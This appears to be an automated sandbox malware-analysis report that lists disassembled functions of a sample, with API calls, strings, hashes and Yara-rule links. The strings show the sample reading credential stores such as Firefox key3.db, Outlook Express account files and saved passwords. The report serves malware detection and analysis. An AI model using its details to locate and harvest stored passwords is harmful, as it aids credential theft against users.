                                          • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004140D3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414105
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: winSeekFile$winTruncate1$winTruncate2
                                          • API String ID: 885266447-2471937615
                                          • Opcode ID: 2e15f3014d93f2bb9130e9841e4fb77219e446d9f82deb2689d2d98ee362e802
                                          • Instruction ID: 64d4eb81a265c1b05a2fdfc4674ac580571b80d59954343c28d6466173863d6d
                                          • Opcode Fuzzy Hash: 2e15f3014d93f2bb9130e9841e4fb77219e446d9f82deb2689d2d98ee362e802
                                          • Instruction Fuzzy Hash: 0331E1B1240700BFE7209F65CC49AA7B7E9FB94714F144A2EF951836C1E738EC948B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406868, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                          • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                          • CloseHandle.KERNEL32(?), ref: 004068B2
                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                                          • String ID: C@$key3.db
                                          • API String ID: 1968906679-1993167907
                                          • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                          • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
                                          • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                          • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401000, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                          • String ID: MS Sans Serif
                                          • API String ID: 3492281209-168460110
                                          • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                          • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
                                          • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                          • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040732D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat
                                          • String ID: 8D
                                          • API String ID: 3951308622-2703402624
                                          • Opcode ID: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                          • Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
                                          • Opcode Fuzzy Hash: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                          • Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00443131, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$_mbscpy
                                          • String ID: Password2
                                          • API String ID: 2600922555-1856559283
                                          • Opcode ID: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                          • Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
                                          • Opcode Fuzzy Hash: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                          • Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041067E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: SHGetSpecialFolderPathA$shell32.dll
                                          • API String ID: 2574300362-543337301
                                          • Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                          • Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
                                          • Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                          • Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B58C, Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy$memcmp
                                          • String ID:
                                          • API String ID: 3384217055-0
                                          • Opcode ID: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                          • Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
                                          • Opcode Fuzzy Hash: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                          • Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00442878, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                          • Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
                                          • Opcode Fuzzy Hash: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                          • Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404883, Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                          • Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
                                          • Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                          • Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041546A, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 211COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset
                                          • String ID: +MA$psow$winOpen
                                          • API String ID: 2221118986-3077801942
                                          • Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                          • Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
                                          • Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                          • Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0042F55D, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: $, $CREATE TABLE
                                          • API String ID: 3510742995-3459038510
                                          • Opcode ID: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                          • Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
                                          • Opcode Fuzzy Hash: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                          • Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402616, Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                          • memset.MSVCRT ref: 0040269F
                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                            • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                          • LocalFree.KERNEL32(?), ref: 00402798
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                          • String ID:
                                          • API String ID: 1593657333-0
                                          • Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                          • Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
                                          • Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                          • Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C5D8, Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040C642
                                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Message$MenuPostSendStringmemset
                                          • String ID:
                                          • API String ID: 3798638045-0
                                          • Opcode ID: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                          • Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
                                          • Opcode Fuzzy Hash: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                          • Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B340, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                            • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                          • strlen.MSVCRT ref: 0040B366
                                          • atoi.MSVCRT ref: 0040B374
                                          • _mbsicmp.MSVCRT ref: 0040B3C7
                                          • _mbsicmp.MSVCRT ref: 0040B3DA
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                          • String ID:
                                          • API String ID: 4107816708-0
                                          • Opcode ID: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                          • Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
                                          • Opcode Fuzzy Hash: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                          • Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00443946, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen
                                          • String ID: >$>$>
                                          • API String ID: 39653677-3911187716
                                          • Opcode ID: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                          • Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
                                          • Opcode Fuzzy Hash: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                          • Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004076FD, Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strlen.MSVCRT ref: 00407709
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                            • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                            • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                            • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                          • memcpy.MSVCRT ref: 0040776C
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocstrlen
                                          • String ID:
                                          • API String ID: 1171893557-0
                                          • Opcode ID: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                          • Instruction ID: 5e9a081d75c64704428ce8041afbbeb9d52fcced2ab343c8e96fa08cc39daf7c
                                          • Opcode Fuzzy Hash: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                          • Instruction Fuzzy Hash: E411DF71200600DFD730EF18D981D9AB7F5EF443247108A2EF552A7692C736B919CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410880, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          • SHGetMalloc.SHELL32(?), ref: 00410890
                                          • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                          • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                          • _mbscpy.MSVCRT ref: 004108E9
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: BrowseFolderFromListMallocPath_mbscpy
                                          • String ID:
                                          • API String ID: 1479990042-0
                                          • Opcode ID: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                          • Instruction ID: 22dc721301a1029169844026e50c0f3522bcecfb2be71eae7d1720ca74c813ee
                                          • Opcode Fuzzy Hash: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                          • Instruction Fuzzy Hash: D311FAB5900208AFDB00DFA9D8849EEBBFCFB49314B10406AEA05E7201D774DA45CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B65E, Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                          • sprintf.MSVCRT ref: 0040B684
                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                          • sprintf.MSVCRT ref: 0040B6AE
                                          • _mbscat.MSVCRT ref: 0040B6C1
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                          • String ID:
                                          • API String ID: 203655857-0
                                          • Opcode ID: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                          • Instruction ID: c6c9d64871d24126578c2fffe8df42e6a01bd33b4583c5a66007e13a3507ac6b
                                          • Opcode Fuzzy Hash: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                          • Instruction Fuzzy Hash: CA018BB650030467EB21B775CC86FE773ACAB04304F04047BB656F51D3DA79E9848A6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004021F6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _ultoasprintf
                                          • String ID: %s %s %s
                                          • API String ID: 432394123-3850900253
                                          • Opcode ID: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                          • Instruction ID: 4eecb7ebe0e72788cc5a9ba801a24b7f953e3738518a64b6aa949e1543d7b5d3
                                          • Opcode Fuzzy Hash: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                          • Instruction Fuzzy Hash: AD41C431804A1987D538D5B4878DBEB62A8A702304F5504BFEC9AB32D1D7FCAE45866E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004086A5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                          • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                            • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                          • String ID: C@
                                          • API String ID: 1449862175-3201871010
                                          • Opcode ID: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                          • Instruction ID: 7447114fd14c0d02a0ee842544e77a6286768af896f3cc7789f687588c6d710a
                                          • Opcode Fuzzy Hash: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                          • Instruction Fuzzy Hash: 88018871C04118AFDB00AF65DC45A8F7FB8DF05364F11C166F855B7191DB349A05CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409669, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00409682
                                          • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: 5\@
                                          • API String ID: 568519121-3174280609
                                          • Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                          • Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
                                          • Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                          • Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407211, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID: L$ini
                                          • API String ID: 714388716-4234614086
                                          • Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                          • Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
                                          • Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                          • Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041104F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • failed memory resize %u to %u bytes, xrefs: 00411074
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _msizerealloc
                                          • String ID: failed memory resize %u to %u bytes
                                          • API String ID: 2713192863-2134078882
                                          • Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                          • Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
                                          • Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                          • Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409570, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                          • strrchr.MSVCRT ref: 00409579
                                          • _mbscat.MSVCRT ref: 0040958E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileModuleName_mbscatstrrchr
                                          • String ID: _lng.ini
                                          • API String ID: 3334749609-1948609170
                                          • Opcode ID: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                          • Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
                                          • Opcode Fuzzy Hash: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                          • Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004033A2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString
                                          • String ID: 34@$Server Details
                                          • API String ID: 1096422788-1041202369
                                          • Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                          • Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
                                          • Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                          • Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004081FD, Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLocalmemcpymemsetstrlen
                                          • String ID:
                                          • API String ID: 3110682361-0
                                          • Opcode ID: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                          • Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
                                          • Opcode Fuzzy Hash: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                          • Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94
                                          Uniqueness

